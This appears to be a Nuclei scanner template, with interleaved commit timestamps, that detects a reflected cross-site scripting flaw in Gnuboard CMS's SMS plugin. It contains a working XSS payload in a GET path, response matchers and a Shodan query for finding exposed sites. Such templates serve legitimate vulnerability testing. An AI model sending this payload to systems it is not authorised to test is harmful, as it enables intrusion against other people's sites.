2022-05-10 04:22:31 +00:00
id : gnuboard-sms-xss
info :
2022-09-21 21:42:27 +00:00
name : Gnuboard CMS - Cross-Site Scripting
2022-05-10 04:22:31 +00:00
author : gy741
severity : medium
2022-09-21 21:42:27 +00:00
description : Gnuboard CMS contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
2022-05-10 04:22:31 +00:00
reference :
- https://sir.kr/g5_pds/4788?page=5
- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
2022-09-21 21:42:27 +00:00
classification :
2023-03-03 15:27:54 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2022-05-12 19:41:32 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2022-05-12 19:41:32 +00:00
shodan-query : http.html:"Gnuboard"
2022-05-10 04:22:31 +00:00
tags : xss,gnuboard
2023-04-27 04:28:59 +00:00
http :
2022-05-10 04:22:31 +00:00
- method : GET
path :
2022-05-12 19:41:32 +00:00
- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
2022-05-10 04:22:31 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-05-12 19:41:32 +00:00
words :
- '"0nuboard<svg onload=alert(document.domain)>"'
2022-05-10 04:22:31 +00:00
- type : word
2022-05-12 19:41:32 +00:00
part : header
2022-05-10 04:22:31 +00:00
words :
- "text/html"
2022-05-12 19:41:32 +00:00
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100dabfa39b6636881c35a5a30673d9b76fcc447af1e2b2c6d3cedb815adfa392d402205ff4c64778cec76efddddd5d376938139916aad734b7077d3fa0286a76ff45d9:922c64590222798bb761d5b6d8e72950